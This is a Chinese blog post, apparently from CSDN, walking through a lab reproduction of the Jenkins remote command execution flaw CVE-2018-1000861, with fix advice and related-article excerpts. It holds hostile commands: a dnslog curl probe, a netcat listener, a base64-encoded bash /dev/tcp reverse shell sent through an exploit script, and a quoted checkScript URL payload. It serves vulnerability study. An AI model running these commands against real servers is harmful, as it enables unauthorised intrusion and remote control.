Jenkins 远程命令执行漏洞 (CVE-2018-1000861)复现

最新推荐文章于 2024-07-27 13:25:11 发布
最新推荐文章于 2024-07-27 13:25:11 发布
阅读量1.6k 收藏 3
点赞数
分类专栏: vulhub 漏洞复现 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myu_wzy/article/details/127430201
版权

文章目录

漏洞描述(介绍、成因)

Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。

通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。

漏洞危害
  • 获取服务器权限
  • 获取敏感数据文件
  • 写入恶意文件getshell
  • 植入木马病毒勒索软件等
适用场景
  • Jenkins主版本 <= 2.153
  • Jenkins LTS版本 <= 2.138.3
实验环境

个人虚拟机

  • 攻击机:
    • Centos7 192.168.10.135
  • 靶机:
    • vulhub 192.168.10.128
漏洞复现过程
1、 开启docker环境

在这里插入图片描述

访问页面,http://192.168.10.128:8000/

在这里插入图片描述

2、通过dnslog检测漏洞是否存在
python exp.py http://192.168.10.128:8080 'curl mmjje4.dnslog.cn'

在这里插入图片描述

Dnslog存在回显,即存在漏洞

在这里插入图片描述

3、监听端口
nc -lvp 12333

在这里插入图片描述

4、利用exp获取反弹shell

1)通过base64加密命令
在这里插入图片描述

2)执行exp

python exp.py http://192.168.10.128:8080/ "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEzNS8xMjMzMyAwPiYxIA==}|{base64,-d}|{bash,-i}"

在这里插入图片描述

3)成功反弹shell

在这里插入图片描述

修复建议
  • 升级到最新版本或打上相关补丁;
  • 尽量不要开放到公网上;
  • 限制IP访问。
扩展知识(链接、文章)

漏洞EXP:https://github.com/orangetw/awesome-jenkins-rce-2019

参考链接:【漏洞复现】Jenkins远程命令执行漏洞(CVE-2018-1000861)

注:本文章仅作技术学习作用,一切实验皆在个人虚拟环境下进行!!!

Myu_ww
关注
专栏目录
Jenkins远程命令执行漏洞CVE-2018-1000861复现
墨痕诉清风的博客
11-06 2179
其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。(1) 下载vulhub项目,然后进入到 vulhub/jenkins/CVE-2018-1000861目录下。(3).然后在我们接收shell的机器上监听之前写的端口。...
漏洞复现Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_45556536的博客
11-17 762
Jenkins反序列化漏洞利用CVE-2017-1000353基础知识漏洞原理影响版本复现思路复现CVE-2018-10008611、特征检测 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。   形成漏洞的根源在于类ObjectInputStream在反序列
jenkins rec 分析 cve-2018-1000861 分析
whatday的专栏
06-02 1071
0x01 Jenkins的动态路由解析 web.xml: 可以看到Jenkins将所有的请求交给org.kohsuke.stapler.Stapler来处理的,跟进看一下这个类中的service方法: 可以看到这里会根据url来调用不同的webApp,如果url以/$stapler/bound/开头,则根节点对象为org.kohsuke.stapler.bind.BoundObjectTable,否则为hudson.model.Hudson(继承jenkins.model.Jenkins
Jenkins远程命令执行漏洞
m0_48520508的博客
12-23 507
0x00简介 Jenkins自动化部署可以解决集成、测试、部署等重复性的工作,工具集成的效率明显高于人工操作;并且持续集成可以更早的获取代码变更的信息,从而更早的进入测试阶段,更早的发现问题,这样解决问题的成本就会显著下降:持续集成缩短了从开发、集成、测试、部署各个环节的时间,从而也就缩短了中间出现的等待时间;持续集成也意味着开发、集成、测试、部署得以持续。 0x01漏洞概述 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者
渗透测试Jenkins远程命令执行漏洞CVE-2018-1000861
最新发布
网络安全从业者的学习笔记
07-27 498
Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 579
Jenkins远程命令执行漏洞CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861
七天
11-25 4498
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
Jenkins远程命令执行漏洞CVE-2018-1000861
EC_Carrot的博客
07-05 401
漏洞复现 只需要访问以下网址即可执行命令: http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript ?sandbox=true &value=public class x { public x(){ "touch /tmp/success".execute(
jenkins2.289.1版本远程命令执行漏洞
山兔的博客
11-13 2983
在网络安全行业中,有一种方法可以识别、定义和编目公开披露的漏洞。这种类型的标识称为CVE,代表常见漏洞和披露。分析后,为每个漏洞分配一个严重等级,称为 CVSS 分数,范围从 0 到 10,其中 0 表示信息,10 表示严重。这些分数取决于几个因素,其中一些是 CIA 的危害级别(机密性、完整性、可用性)、攻击复杂程度、攻击面的大小等。在计算机安全中,任意代码执行 (ACE) 是攻击者在目标计算机或目标进程中执行任意命令或代码的能力。[…]旨在利用此类漏洞的程序称为任意代码执行漏洞
[漏洞复现] jenkins 远程代码执行CVE-2019-100300)
qq_45751902的博客
11-24 2194
拥有Overall/Read 权限的用户可以绕过沙盒保护,在jenkins可以执行任意代码。此漏洞需要一个账号密码和一个存在的job。Jenkins的pipeline主要是通过一个配置文件或者job里面的pipeline脚本配置来设定每个job的步骤. pipeline定义了几乎所有要用到的流程, 比如执行shell, 存档, 生成测试报告, 发布报告等。
利用Vulnhub复现漏洞 - Jenkins远程命令执行漏洞CVE-2018-1000861
JiangBuLiu的博客
07-11 4501
Jenkins远程命令执行漏洞CVE-2018-1000861)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现POC检验 Vulnhub官方复现教程 https://vulhub.org/#/environments/jenkins/CVE-2018-1000861/ 漏洞原理 Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这...
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353)
玄道的网安博客
06-18 671
环境搭建 使用vulhub和docker搭建环境 cd /vulhub/jenkins/CVE-2017-1000353 docker-compose up -d 访问http://your-ip:8080即可看到jenkins已成功运行 漏洞复现 wget https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar 获取CVE-2017-1
jenkins漏洞复现
Shanfenglan's blog
11-30 1582
文章目录什么是jenkinsJenkins远程命令执行漏洞CVE-2018-1000861)参考文章 什么是jenkins 实现了CI/CD的产品。jenkins会从git或者svn上拉代码然后在配置所指向的环境中进行编译并上线。 Jenkins的思想就是自动化部署,“自动化”的具体体现在:当我们向版本库(SVN)提交新的代码后,应用服务器(Tomcat)就会自动从我们的SVN上拉去新的war包,然后重新部署,用户或测试人员看到的就是最新的应用程序。 Jenkins远程命令执行漏洞CVE-2018-10
漏洞复现-Jenkins
aming小老弟
10-03 568
渗透
Jenkins漏洞CVE-2017-1000353)复现
qq_62056583的博客
07-05 662
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码,漏洞利用不需要任何的权限。网上查找相关资料显示,漏洞经过序列化的Java SignedObject对象传输到基于远程处理的Jenkins CLI,在使用新的对象ObjectInputStream对其进行反序列化操作即可绕过现有的基于黑名单的保护机制。查看tmp目录下是否成功生成,但我的虚拟机中并没有生成相应的数据包,或者说是我的Java环境出的问题(该项实验目前还没成功实现)对生成的字节码文件进行发送,使用预备知识第二条指令。
Jenkins远程代码执行漏洞
chaojixiaojingang
09-07 1551
1.资产查找 Fofa:title=”jenkins” 2.漏洞描述: Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台。Jenkins存在远程代码执行漏洞漏洞成因是Jenkins平台提供了一个界面给使用者检查自己的Pipeline脚本,使用GroovyClassLoader.parseClass()来检查Pipeline脚本语法的正确性,攻击者构造特定的代码造成远程代码执行,攻击者通过该漏洞可获取服务器完全...
Jenkins-CI 远程代码执行漏洞复现CVE-2017-1000353)
m0_63082628的博客
07-05 1395
Jenkins-CI 远程代码执行漏洞复现
Jenkins Git client插件CVE-2019-10392:命令执行漏洞分析
Jenkins Git client插件命令执行漏洞(CVE-2019-10392) Jenkins Git client插件是一个广泛使用的工具,它允许Jenkins与Git版本控制系统进行交互,以便在持续集成和持续部署流程中自动获取代码仓库的更新。然而,在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值